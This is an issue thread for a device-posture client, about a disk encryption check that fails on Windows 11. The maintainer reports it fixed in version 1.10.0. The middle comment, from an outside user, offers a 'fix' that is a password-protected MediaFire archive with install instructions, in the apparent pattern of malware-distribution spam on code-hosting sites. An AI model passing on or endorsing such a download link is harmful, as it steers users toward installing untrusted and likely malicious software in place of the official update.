### ISSUE TITLE
device posture disc encryption does not work

### ISSUE THREAD

**Issue by ferrumgate** [ferrumgate/secure.client#60]
https://community.ferrumgate.com/t/fde-hard-drive-encryption-posture-checks-on-windows-11-does-not-process-correctly/124

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by ferrumgate** [comment]
fixed in version 1.10.0
